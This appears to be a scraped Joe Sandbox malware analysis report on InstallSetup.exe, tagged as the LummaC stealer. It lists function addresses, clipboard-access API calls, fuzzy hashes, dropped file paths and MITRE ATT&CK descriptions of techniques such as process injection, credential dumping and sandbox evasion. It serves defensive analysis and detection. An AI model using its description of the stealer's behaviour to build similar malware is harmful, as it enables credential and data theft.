Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 009A2144 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009A214E
VariantInit.OLEAUT32 ref: 009A2161

Strings

n, xrefs: 009A2216
v, xrefs: 009A21A6
z, xrefs: 009A21D6
e, xrefs: 009A2186
p, xrefs: 009A2226
z, xrefs: 009A2196
p, xrefs: 009A2206
A, xrefs: 009A21F6
w, xrefs: 009A21B6
e, xrefs: 009A21C6

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: f7f114f429909d1d8530ca22630bbc838de58076f5afe299f1dbbef83a500eab
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: D841262160C7C18ED331CB38885879BBFD2ABA7324F088AADD4E9872D6D7794505C763

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 009A2C27 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009A2C49
GetClipboardData.USER32 ref: 009A2C6C
GlobalLock.KERNEL32 ref: 009A2C89
GlobalUnlock.KERNEL32 ref: 009A2DD2
CloseClipboard.USER32 ref: 009A2DDA

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction ID: 90cce15511b010e1c79e2d2fe57c19624d21132c3f36d757cf8bb489c6b5dbf8
Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
Instruction Fuzzy Hash: 9651D4F1D08A928FD700AB7CC44936EFFA0AB52310F058A38D9999B792D3799954C7D3

Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
FreeLibrary.KERNEL32 ref: 0040B3B7

Strings

Wu, xrefs: 0040B396, 0040B3B7

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report InstallSetup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_C7B4.tmp.exe_742e65afcf5e79946837b92738bef5535819be8_85f1e870_f11681dd-b311-48cb-ae4e-cddbcb05ea98\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDA32.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB8B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBCA.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
InstallSetup.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0094003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre